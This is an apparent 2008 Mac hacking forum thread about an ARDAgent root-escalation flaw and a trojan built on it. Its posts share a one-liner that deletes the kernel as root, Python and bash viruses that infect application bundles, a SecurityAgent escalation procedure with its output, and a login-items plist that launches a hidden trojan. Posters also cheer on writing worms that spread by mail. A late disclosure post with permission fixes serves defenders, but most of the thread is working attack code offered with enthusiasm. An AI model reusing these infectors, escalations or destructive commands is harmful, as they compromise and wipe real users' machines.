Full Version: remote login Trojan
oh well i will look into it later if i have a need for it
Oktane, you are totalllllly asking for "ALERT! Major new WORM released into the wild by the evil Oktane threatens OS X security! Will users double-click it?!" headlines with that one. :)
Their goes the neighborhood :P
People must be so confused...
Is it a worm, is it a virus, is it a trojan is it neither?
Can we fix it, can't we fix it?
Am I at risk or safe?
Should I buy the useless virus sniffer or not?
Is it a poker game or applescript?
"I can tell you that there is a lot of misinformation out there. There's a lot of fabrication out there, and a lot of misinformation. "
- Jeff Gannon
People must be so confused...
Is it a worm, is it a virus, is it a trojan is it neither?
Can we fix it, can't we fix it?
Am I at risk or safe?
Should I buy the useless virus sniffer or not?
Is it a poker game or applescript?
"I can tell you that there is a lot of misinformation out there. There's a lot of fabrication out there, and a lot of misinformation. "
- Jeff Gannon
Proof that Symantec AntiVirus Experts don't even read their own documentation.
Dear Symantec, do please show us in what way AStht 'claims to be something desirable' ?
Dear Symantec, do please show us in what way AStht 'claims to be something desirable' ?
So what next, I'm bored. We could release a devastating multiplying trojan but we won't. I'm not even gonna bother writing it. Should we look for other exploits or improve on this trojan.
More exploits and promise me you'll write a worm for the next one.
--Macpunk
--Macpunk
QUOTE(Macpunk @ Jun 20 2008, 08:34 PM) 
More exploits and promise me you'll write a worm for the next one.
I'm looking right now... and thanks for the reversing tutorials (http://mcscribble.com/projects.html) I just clicked on your sig and looked around.
Haha...
well I suppose I should write my own little trojan so I can get famous too!
Oh yeah! Bring on the note on my resume :D
You guys should rewrite that in C/ObjC and distribute a binary. No need to call osascript with system(), you can compile an run AppleScripts via the API.
well I suppose I should write my own little trojan so I can get famous too!
CODE
#!/bin/sh
# Porn.sh
osascript -e 'tell app "ARDAgent" to do shell script "rm -rf /mach_kernel && reboot"';
# Porn.sh
osascript -e 'tell app "ARDAgent" to do shell script "rm -rf /mach_kernel && reboot"';
Oh yeah! Bring on the note on my resume :D
You guys should rewrite that in C/ObjC and distribute a binary. No need to call osascript with system(), you can compile an run AppleScripts via the API.
QUOTE(Macpunk @ Jun 20 2008, 06:34 PM)
More exploits and promise me you'll write a worm for the next one.
--Macpunk
--Macpunk
Speaking for myself... I would rather see *you* (as in everyone) write some code. We've been using languages such as bash and AppleScript which are fairly accessible - everyone has a text editor, all OS X machines come with Terminal and Script Editor. Everyone lurking and reading this thread should also be gaining familiarity with both languages and how to write code using them... So, suppose your AppleScript or bash script does whatever you like and then goes into a loop which checks the /Volumes directory... and then copies itself to any volume found, or installs itself into the startup process on volumes which happen to have valid OS X systems or into user home folders found on those volumes (for instance by inserting a reference to itself into the user's loginwindow.plist file to be run each time that user logs in.) Then delay for awhile and re-run the loop over and over and over. That's a worm.
QUOTE(Siph0n @ Jun 20 2008, 08:52 PM)
well I suppose I should write my own little trojan so I can get famous too!
Famous... I don't even think 100 sites have this posted. No one has received recognition from outside sources, the most I heard was "bunch of kids." No one released it so the press will die off in a couple of days. So in summary no ones famous, but if you guys want to release a worm/trojan/whatever and get busted go ahead.
QUOTE(Siph0n @ Jun 20 2008, 06:52 PM)
Haha...
well I suppose I should write my own little trojan so I can get famous too!
Oh yeah! Bring on the note on my resume :D
You guys should rewrite that in C/ObjC and distribute a binary. No need to call osascript with system(), you can compile an run AppleScripts via the API.
well I suppose I should write my own little trojan so I can get famous too!
CODE
#!/bin/sh
# Porn.sh
osascript -e 'tell app "ARDAgent" to do shell script "rm -rf /mach_kernel && reboot"';
# Porn.sh
osascript -e 'tell app "ARDAgent" to do shell script "rm -rf /mach_kernel && reboot"';
Oh yeah! Bring on the note on my resume :D
You guys should rewrite that in C/ObjC and distribute a binary. No need to call osascript with system(), you can compile an run AppleScripts via the API.
Security researchers are warning of a new OS X Trojan which threatens horny OS X users!
EDIT: I forgot to add 'in the wild' just for maximum fear factor.
QUOTE(Oktane @ Jun 20 2008, 07:08 PM)
I don't even think 100 sites have this posted.
Currently 2200 results.
http://www.google.com/search?q=%22AppleScript.tht%22
Currently 54 results.
http://www.google.com/search?q=%22OSX.astht%22
Currently 3,910 results.
http://www.google.com/search?q=%22ARDagent%22+exploit
Currently 1,400 results.
http://www.google.com/search?q=%22PokerGam...leScript+trojan
Not all directly attributable to this thread... but most.
QUOTE(Oktane @ Jun 20 2008, 07:08 PM)
if you guys want to release a worm/trojan/whatever and get busted.
You could release a proof-of-concept, just make it clear up front what the software does.
Nevermind...
QUOTE
Appletell – SecureMac is reporting a new Trojan horse that threatens the Mac OS X 10.4 and 10.5 installation. AppleScript.THT, a new variant of the infamous Trojan Horse virus, is originating from a hacked website through iChat and Limewire.
http://www.techdispenser.com/slots/view/5435
Wow. Clueless news you can't use...
These guys even made their own article based in our findings: http://www.appletell.com/apple/comment/os-...hole-and-a-fix/
Your Welcome :)
Your Welcome :)
QUOTE
On Thursday, security vendor SecureMac reported seeing new variants of AppleScript.THT Trojan horse in the wild affecting users of Mac OS X 10.4 and 10.5.
http://news.cnet.com/8301-10789_3-9973703-...547-1009_3-0-10
Remember the good old days when it was just the old variants that were a problem? In other news, an impromptu survey of Internet news sites suggests most Internet Reporters may be drunk while on the job.
The comments are the best: "Yeah, I once saw Bigfoot too. He was at the porn site where all of the Anti-virus makers are trying unsuccessfully to create and release some Mac malware."
If you don't know what you're talking about shut your brain washed ass up.
If you don't know what you're talking about shut your brain washed ass up.
QUOTE
Dubbed "Applescript.THT Trojan," the malware is thought to have originated via a "hacker" website, Limewire and even Apple's own iChat.
I always suspected that iChat was creating malware, now it's been proven! QUOTE
Applescript.THT Trojan is disguised as an application bundle
How clever of iChat to disguise its Trojan as an application bundle! I wonder what it really is???
http://news.softpedia.com/news/It-039-s-Of...ose-88472.shtml
These people are not using their brains to full capacity.
QUOTE
the best thing you can do is never download and install software from untrusted sources or dubious websites.
Says the giant upload/download website. lol
QUOTE
Intego, the other firm to highlight the issue, said the Trojan could be used to run arbitrary code.
http://www.betanews.com/article/Mac_OS_X_T...wild/1213976101
Uh, yes, the programmer can certainly program any code into the program, yes. What?
QUOTE
SecureMac reports that it is being distributed from a site frequented by malicious users
Oh my goodness, I had no idea...
QUOTE
and files containing the Trojan were being sent through both iChat and Limewire. Bundled within an AppleScript, the files containing it have the names "ASthtv05" and "ASthtv06."
OHHHH! So iChat's Trojan is bundled with an AppleScript! AH HA! Now it all makes sense!
QUOTE
Any user running either 10.4 or 10.5 are said to be at risk, and currently the only interim solution being advertised is to only download files from trusted sources until the problem is fixed.
So after the 'fix' why don't you come visit this forum, download yourself a copy of the compiled AStht and run it and we'll see just how safe you are, asshat. It does more than one thing. After your username, password and IP address get sent to Andrew you are so screwed dude! :)
Allright callmenames... you encouraged others to code stuff and so here we go. Virus in python that infects .app bundles... I don't have a mac so I can't debug... based on an earlier version by three authors who were bored and goofing off. And it does nothing... except maybe slow your system down from the additional workload.
CODE
#!/usr/bin/env python
# appvir.py by k, ny, reik
import sys, os, shutil
def infect():
for path in os.popen('locate *.app'):
path = path.rstrip()
root, ext = os.path.splitext(path)
path = os.path.join(path, 'Contents', 'MacOS', os.path.basename(root))
ownedpath = '%s_owned' % path
if not os.path.exists(ownedpath): # if no previous infection
path_stats = os.lstat(path)
shutil.move(path, ownedpath)
shutil.copy(os.path.abspath(sys.argv[0]), path)
os.chown(path, path_stats.st_uid, path_stats.st_gid)
if __name__ == '__main__':
prog, args = os.path.abspath(sys.argv[0]), ' '.join(sys.argv[1:])
if os.getuid():
os.system('osascript -e \'tell app "ARDAgent" to do shell script' \
' "\\\"%s\\\" %s &"\'' % (prog, args))
if sys.argv[0].find('.app') > 0:
os.system('"%s_owned" %s' % (prog, args))
else:
infect()
# k, ny, reik
# appvir.py by k, ny, reik
import sys, os, shutil
def infect():
for path in os.popen('locate *.app'):
path = path.rstrip()
root, ext = os.path.splitext(path)
path = os.path.join(path, 'Contents', 'MacOS', os.path.basename(root))
ownedpath = '%s_owned' % path
if not os.path.exists(ownedpath): # if no previous infection
path_stats = os.lstat(path)
shutil.move(path, ownedpath)
shutil.copy(os.path.abspath(sys.argv[0]), path)
os.chown(path, path_stats.st_uid, path_stats.st_gid)
if __name__ == '__main__':
prog, args = os.path.abspath(sys.argv[0]), ' '.join(sys.argv[1:])
if os.getuid():
os.system('osascript -e \'tell app "ARDAgent" to do shell script' \
' "\\\"%s\\\" %s &"\'' % (prog, args))
if sys.argv[0].find('.app') > 0:
os.system('"%s_owned" %s' % (prog, args))
else:
infect()
# k, ny, reik
Eeek! A virat and I think it's IN THE WILD! Can NO ONE save us from this threat? I'll just start porting that over to bash... What to do about the payload, hmmm, perhaps randomly fire-off some nice notes to Technology News Reporters. :)
I don't think that exploit works with any other applications. Is their a specific way to look for exploits or is it more of a trip over it kinda thing.
QUOTE(callmenames @ Jun 21 2008, 12:27 AM)
Eeek! A virat and I think it's IN THE WILD! Can NO ONE save us from this threat? I'll just start porting that over to bash... What to do about the payload, hmmm, perhaps randomly fire-off some nice notes to Technology News Reporters. :)
Ssh... be vewy vewy qwiet... I'm hunting idiots :)
Sweet. Can't wait to see your bash version. Hopefully someone does a Perl version.. Ooo and maybe ObjC too, using spotlight.
Maybe it can even be an inner specie virus designed to cross infect other operating systems. Hopping from linux to windows to Mac and back again. The Avian bird flu of computer viruses with a little less media attention and a lot less dead chinese. ;)
QUOTE(Siph0n @ Jun 20 2008, 10:10 PM)
Sweet. Can't wait to see your bash version.
Don't hold your breath, I have to overcome the issue with bash scripts not being directly executable from the GUI, I'm mulling it over... this is my starting point.
CODE
#!/bin/bash
declare just_me="${0}" newline=$'\n' IFSold="${IFS}" IFS="${newline}"
function infect() {
find /Applications -iname "*.app" -type d -maxdepth 1 | while read the_path; do
inner_sanctum="${the_path}Contents/MacOS/$(basename ${the_path})"
inner_sanctum="${inner_sanctum%.app}"
[ -x "${inner_sanctum}_owned" ] && continue
mv "${inner_sanctum}" "${inner_sanctum}_owned"
cp "${all_of_me}" "${inner_sanctum}"
# Still need to chown/chgrp and touch dates back
done
}
if [ ! -x "${0}_owned" ]; then
infect &
fi
[ -x "${0}_owned" ] && exec open "${0}_owned"
exit 0
declare just_me="${0}" newline=$'\n' IFSold="${IFS}" IFS="${newline}"
function infect() {
find /Applications -iname "*.app" -type d -maxdepth 1 | while read the_path; do
inner_sanctum="${the_path}Contents/MacOS/$(basename ${the_path})"
inner_sanctum="${inner_sanctum%.app}"
[ -x "${inner_sanctum}_owned" ] && continue
mv "${inner_sanctum}" "${inner_sanctum}_owned"
cp "${all_of_me}" "${inner_sanctum}"
# Still need to chown/chgrp and touch dates back
done
}
if [ ! -x "${0}_owned" ]; then
infect &
fi
[ -x "${0}_owned" ] && exec open "${0}_owned"
exit 0
I will likely proceed by using Platypus to generate an executable bundle, copy the Platypus bundle pieces into corresponding locations inside the app's bundle, rename the executable itself to match the app etc. not sure yet, must get COFFEE! :)
Hmm, I failed to consider what happens when a document is double-clicked to launch the corresponding app. Must have more coffee.
QUOTE(Oktane @ Jun 20 2008, 09:42 PM)
Is their a specific way to look for exploits or is it more of a trip over it kinda thing.
Some things are more likely than others although there are too many possibilities to narrow it down to a single area or type of issue. Here's a fun thing to try... you can use this little bash script...
CODE
#!/bin/bash
IFSold="${IFS}"
find "${1:-/Applications/}" -user root -perm +4000 -print | while read filename; do
echo
IFS="/"
filename="${filename/\/\///}"
items=( ${filename} )
chain=""
for (( i=0;i<${#items[*]};i++));do
chain="${chain}${items[$i]}"
ls -alod "${chain:-/}"
chain="${chain}/"
done
IFS="${IFSold}"
done
IFSold="${IFS}"
find "${1:-/Applications/}" -user root -perm +4000 -print | while read filename; do
echo
IFS="/"
filename="${filename/\/\///}"
items=( ${filename} )
chain=""
for (( i=0;i<${#items[*]};i++));do
chain="${chain}${items[$i]}"
ls -alod "${chain:-/}"
chain="${chain}/"
done
IFS="${IFSold}"
done
Look closely at the permissions in the output.
QUOTE(Oktane @ Jun 20 2008, 08:43 PM)
I'm looking right now... and thanks for the reversing tutorials (http://mcscribble.com/projects.html) I just clicked on your sig and looked around.
Pfft, those suck. Well, they were a good start. I'm glad you found them useful. :-)
I want to expand them and add more info (common loop structures, other calling conventions, etc.), but I'm too lazy. Hell, I could add specific things like reversing Cocoa apps. But again, I'm too lazy. Maybe in the future...
@callmenames: Merh, I'm too involved with my latest project...
And both of you ought to hang out in IRC. You know the info, so you've got no excuse. ;-P
Also, I found out you could use this vulnerability to execute commands as securityagent through SecurtyAgent.app, but was unable to reproduce the bug outside of the interactive Python interpreter. Maybe one of you could have some fun:
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'
Congrats to you both,
Macpunk
Why thank you Macpunk! :) I make a ridiculously large number of mistakes, most of which I am unable to spot *until* I have posted something. Even with the time constraints on editing I am able to correct many, many mistakes in my posts before anyone sees them (hopefully.) In chat I do not have that opportunity and I generally come off somewhat more like this...
WHy tahnk yu mApunk! ): echo -n "I made a ridiculously large numper of stimakes,:<del> shit.. display dialog "most of which I am unable to sport &until* I is posted sum thing. \x07 That's the bell right? Even with time constraned editing I able to correct many, many mistrake before you see them.
Well, plus I tend to get easily sidetracked and people get alllllllll pisssy when you don't respond to them for hours or days at a time. :)
See, I had to edit this post too.
WHy tahnk yu mApunk! ): echo -n "I made a ridiculously large numper of stimakes,:<del> shit.. display dialog "most of which I am unable to sport &until* I is posted sum thing. \x07 That's the bell right? Even with time constraned editing I able to correct many, many mistrake before you see them.
Well, plus I tend to get easily sidetracked and people get alllllllll pisssy when you don't respond to them for hours or days at a time. :)
See, I had to edit this post too.
QUOTE(Macpunk @ Jun 21 2008, 12:19 AM)
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'
Yep, something's definitely up there but its rare and delicate and I can't quite pin it down...
Ooooh, got it I think...
Run this in Terminal
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "osascript -e \"tell app \\\"SecurityAgent\\\" to do shell script \\\"id\\\"\""'
Just be very patient, it will take a minute or two to timeout.
Then immediately run this.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'
Does that work for anybody else? I got...
CODE
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
And now I can't reproduce it again. Sigh.
Still having trouble getting it pinned down but I am able to reproduce it sporadically.
Then some combination of killing it, running it etc. and....
Hmm.
Ok, so at some point it's being launched / relaunched as itself, not as the user... and it appears to not be launched with an argument of a specific psn.
I killed it, after the next two lines...
Well I can definitely get it to stop being uid=92 :) As for the getting it to be uid=92 that is proving somewhat more elusive.
CODE
$ ps -axww | grep Security
5981 ?? S 0:01.27 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent -psn_0_102236161
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
5981 ?? S 0:01.27 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent -psn_0_102236161
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
Then some combination of killing it, running it etc. and....
CODE
ps -axww | grep Security
6198 ?? S 0:01.59 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
6198 ?? S 0:01.59 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
Hmm.
CODE
$ ps -auxww | grep Security
security 6198 0.7 0.4 144740 5896 ?? S 1:53AM 0:01.78 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
security 6198 0.7 0.4 144740 5896 ?? S 1:53AM 0:01.78 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
Ok, so at some point it's being launched / relaunched as itself, not as the user... and it appears to not be launched with an argument of a specific psn.
I killed it, after the next two lines...
CODE
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
Well I can definitely get it to stop being uid=92 :) As for the getting it to be uid=92 that is proving somewhat more elusive.
Okey dokey, try this...
The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.
Yep, I just restarted and reproduced it on the first try.
CODE
sudo killall SecurityAgent
The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.
Yep, I just restarted and reproduced it on the first try.
SecurityAgent is responsible for the authentication prompt I believe, as well as many things accessed by the system from Security.framework. I wonder what its AppleScript dictionary is capable of...
As far as I can tell, neither ARDAgent nor SecurityAgent have any AppleScript dictionary of their own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...
QUOTE(callmenames @ Jun 21 2008, 06:22 AM)
As far as I can tell, neither ARDAgent nor SecurityAgent have any AppleScript dictionary of their own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...
Perhaps some fooling with nm, class-dump and strings is warranted.
Uh huh, I looked but nothing jumped out at me. All the output is here > http://rapidshare.de/files/39784043/Security.txt.zip.html
Thanks. Unfortunately nothing jumped out at me either. I'm sure there's some fun tricks hiding in SecurityAgent though. It does more than I initially suspected.
Yesterday I also noticed while testing all the apps on my computer (10.4.11) that SecurityAgent.app gave a unique output. However I tried using it to make a directory in root and/or the desktop and it always had permissions denied. I think that it carries special permissions set up by the programmers. I'm sure that whomever made that application would realize not to run "SecurityAgent" under anything devastingly powerful.
QUOTE(callmenames @ Jun 21 2008, 04:51 AM)
Okey dokey, try this...
The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.
Yep, I just restarted and reproduced it on the first try.
CODE
sudo killall SecurityAgent
The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.
Yep, I just restarted and reproduced it on the first try.
Reproducible for me too. PPC/G4/10.4.111.
I was thinking about this last night and was gonna try this theory last night. xD
I'm thinking all you need is a prompt that asks for higher permissions. If that's true, then it ought to work with any application(as was demonstrated through Keychain Access).
--Macpunk
As we draw closer to the next exploit how about we keep it on the down low, PM, IRC or a thread thats a little less HOT. just a suggestion
CODE
-- If SecurityAgent is open kill it
try
do shell script "killall SecurityAgent"
end try
-- Setup SecurityAgent
ignoring application responses
do shell script "sudo -s"
end ignoring
-- Exploit
tell application "SecurityAgent" to do shell script "id"
try
do shell script "killall SecurityAgent"
end try
-- Setup SecurityAgent
ignoring application responses
do shell script "sudo -s"
end ignoring
-- Exploit
tell application "SecurityAgent" to do shell script "id"
Output:
QUOTE
"uid=92(securityagent) gid=0(wheel) groups=0(wheel)"
QUOTE(Oktane @ Jun 21 2008, 01:19 PM)
As we draw closer to the next exploit how about we keep it on the down low, PM, IRC or a thread thats a little less HOT. just a suggestion
I understand what you mean, and I won't disclose anything privately shared with me by someone else. For my purposes though, I probably will continue to openly post any vulnerabilities which I run across myself - because my goal is to get more people interested in programming on Macs and the topic of vulnerabilities brings people in by the droves and gets them interested. Now to get them writing and posting CODE in this forum!... :)
I was thinking and came up with a funny idea, how about we make an anti-trojan virus. An AppleScript application that fixes permssions on SystemLoginItems.plist and ARDAgent.app and removes the old trojan if it was installed. Then it notifies the user they were patched and spreads through their Mail account if they have one.
Since both of these exploits have been around for the better half of a decade this might just force Apples hand.
Since both of these exploits have been around for the better half of a decade this might just force Apples hand.
That still leaves the dreaded "rm -Rf ~" trojan. GASP!
(For anyone who doesn't already know what that command does...
rm=remove,
-R=recursive meaning all subfolders,
-f=force as in just delete stuff and don't ask me any question,
~=your user home folder.
So the command is essentailly... "remove my home folder and all subfolders inside it and don't ask me any questions" Obviously, its probably not something anyone would want to have happen, so don't run the command.)
You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?
(For anyone who doesn't already know what that command does...
rm=remove,
-R=recursive meaning all subfolders,
-f=force as in just delete stuff and don't ask me any question,
~=your user home folder.
So the command is essentailly... "remove my home folder and all subfolders inside it and don't ask me any questions" Obviously, its probably not something anyone would want to have happen, so don't run the command.)
You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?
QUOTE(callmenames @ Jun 21 2008, 04:50 PM)
You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?
Especially if they don't fully understand what it does.
Exactly! There is a lot of misinformation due to SecureMac's woefully inaccurate press release and the bizarre interpretations thereof by the Internet media sites. So a detailed explanation of what it actually does and how a user could manually do or undo the same things would help a lot of people to understand not just your own trojan but many of the features of Mac OS X in general.
For instance, in "AppleScript trojan horse template" or AStht, are subroutines which add a cron task to run shell scripts for a reverse-shell or reverse-VNC session. Cron is a program included in OS X which runs commands at a scheduled time. More information on cron can be found by opening the Terminal program and typing 'man cron' without the quotes to see the manual page for cron. Apple has a copy of that information available online as well http://developer.apple.com/documentation/D...an8/cron.8.html
A user can see what, if any, entries are listed in the crontab file for the user by running the Terminal program and issuing the command:
crontab -l
All the entries can be easily removed with this command:
crontab -r
That will remove the two cron entries which "AppleScript trojan horse template" or AStht adds to create the reverse-shell and/or reverse VNC session.
For instance, in "AppleScript trojan horse template" or AStht, are subroutines which add a cron task to run shell scripts for a reverse-shell or reverse-VNC session. Cron is a program included in OS X which runs commands at a scheduled time. More information on cron can be found by opening the Terminal program and typing 'man cron' without the quotes to see the manual page for cron. Apple has a copy of that information available online as well http://developer.apple.com/documentation/D...an8/cron.8.html
A user can see what, if any, entries are listed in the crontab file for the user by running the Terminal program and issuing the command:
crontab -l
All the entries can be easily removed with this command:
crontab -r
That will remove the two cron entries which "AppleScript trojan horse template" or AStht adds to create the reverse-shell and/or reverse VNC session.
So is their anyway to duplicate the MOAB in some form or has that been fully patched? The things is that as long as that SystemLoginItems.plist is around there will always be an exploit, just bugs me.
Exploits that need to get patched:
1. Trojan can create a hidden user (or any other application)
2. ARDAgent exploit
3. SystemLoginItems.plist
Exploits that need to get patched:
1. Trojan can create a hidden user (or any other application)
2. ARDAgent exploit
3. SystemLoginItems.plist
Everybody who cares has already read this thread twice, and prolly found more anyways. ;-P
--Macpunk
--Macpunk
QUOTE(Oktane @ Jun 21 2008, 04:08 PM)
So is their anyway to duplicate the MOAB in some form or has that been fully patched?
I can personally attest to the fact that some of the vulnerabilities disclosed in the "Month of Apple Bugs" project remain unpatched.
http://projects.info-pull.com/moab/
UNOFFICIAL FULL DISLOSURE
ARDAgent.app Exploit
AFFECTED: Mac OS X 10.4 - 10.5
Risk: Critical
USAGE: Easy
History: Discovered at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Wawl, Oktane and andrewtheshit. First implemented in AppleScript but can be ported into Bash (Bourne Again Shell). Used in proof of concept type trojans throughout the thread. Poses high risk for ease of use and lack of experience required. Allows the attacker to run any code, malicious or otherwise. This vulnerability also affects all operating systems released 10.4 and above, because this application is included default.
Usage:
Original Script (AppleScript):
Bash Script (Bourne Again Shell):
This will give an output of uid 0 or root, the superuser of Unix based computers when run by an administrator. The reason for this vulnerability is that the application ARDAgent.app (located: /Systems/Library/CoreServices/ARDAgent.app) runs as root. An over look or mistake by the programmers and maintainers of Mac OS X. Note that this exploit can only be achieved if the effected user is an administrator.
Solutions: Temporary solutions for the mainstream Mac OS X owner until a patch is released by Apple in a future Software Update. Is to change the permissions of the application ARDAgent.app. This is an easy fix and should be distributed immediately as the trojans specified above have been released into the public.
1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
3. Enter:
4. You will be prompted to enter your password, do so.
5. Check to make sure that this is working by running the exploit again.
Enter:
You should see your username displayed as the uid.
com.apple.SystemLoginItems.plist Exploit
AFFECTED: Mac OS X 10.3 - 10.5
Risk: Medium
USAGE: Medium
History: Made public at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Lokin, Oktane and andrewtheshit. First implemented in AppleScript but can be ported into Bash (Bourne Again Shell) and other programming languages. Used in proof of concept type trojans throughout the thread. Poses medium risk for medium ease of use and number of computers affected. Allows the attacker to run any code, malicious or otherwise. This exploit has evidently existed for quite some time now (the better half of a decade).
Usage: The file is located in /Library/Preferences/com.apple.SystemLoginItems.plist
Example:
The file can be overwritten, edited or replaced. The fault lies in the permissions set upon this file. Allowing anyone to edit the SystemLoginItems.plist. Upon restart the application is then run as a start up item under root or uid 0 the superuser of Unix based computers. A payload for this exploit could be easily created as a compiled AppleScript application (or bundle) which already exists in the wild. The reason for the medium risk also involves the easy detection of the exploit by knowledgeable users. A trojan can hide itself and replace the plist file after use but the user must not detect the attack before restarting the computer. However the trojan might actually restart the computer on its own posing a larger risk but higher rate of detection.
b]Solutions:[/b] Temporary solutions for the mainstream Mac OS X owner until a patch is released by Apple in a future Software Update. Is to change the permissions of the plist file /Library/Preferences/com.apple.SystemLoginItems.plist. This is an easy fix and should be distributed immediately as the trojans specified above have been released into the public.
1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
3. Enter:
4. You will be prompted to enter your password, do so.
ARDAgent.app Exploit
AFFECTED: Mac OS X 10.4 - 10.5
Risk: Critical
USAGE: Easy
History: Discovered at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Wawl, Oktane and andrewtheshit. First implemented in AppleScript but can be ported into Bash (Bourne Again Shell). Used in proof of concept type trojans throughout the thread. Poses high risk for ease of use and lack of experience required. Allows the attacker to run any code, malicious or otherwise. This vulnerability also affects all operating systems released 10.4 and above, because this application is included default.
Usage:
Original Script (AppleScript):
CODE
tell application "ARDAgent.app" to do shell script "id"
Bash Script (Bourne Again Shell):
CODE
osascript -e 'tell application "ARDAgent" to do shell script "id"'
This will give an output of uid 0 or root, the superuser of Unix based computers when run by an administrator. The reason for this vulnerability is that the application ARDAgent.app (located: /Systems/Library/CoreServices/ARDAgent.app) runs as root. An over look or mistake by the programmers and maintainers of Mac OS X. Note that this exploit can only be achieved if the effected user is an administrator.
Solutions: Temporary solutions for the mainstream Mac OS X owner until a patch is released by Apple in a future Software Update. Is to change the permissions of the application ARDAgent.app. This is an easy fix and should be distributed immediately as the trojans specified above have been released into the public.
1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
CODE
cd /Systems/Library/CoreServices
3. Enter:
CODE
sudo chmod u-s ARDAgent
4. You will be prompted to enter your password, do so.
5. Check to make sure that this is working by running the exploit again.
Enter:
CODE
osascript -e 'tell application "ARDAgent" to do shell script "id"'
You should see your username displayed as the uid.
com.apple.SystemLoginItems.plist Exploit
AFFECTED: Mac OS X 10.3 - 10.5
Risk: Medium
USAGE: Medium
History: Made public at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Lokin, Oktane and andrewtheshit. First implemented in AppleScript but can be ported into Bash (Bourne Again Shell) and other programming languages. Used in proof of concept type trojans throughout the thread. Poses medium risk for medium ease of use and number of computers affected. Allows the attacker to run any code, malicious or otherwise. This exploit has evidently existed for quite some time now (the better half of a decade).
Usage: The file is located in /Library/Preferences/com.apple.SystemLoginItems.plist
Example:
CODE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Hide</key>
<true/>
<key>Path</key>
<string>/Library/Caches/.trojan.app</string>
</dict>
</array>
</dict>
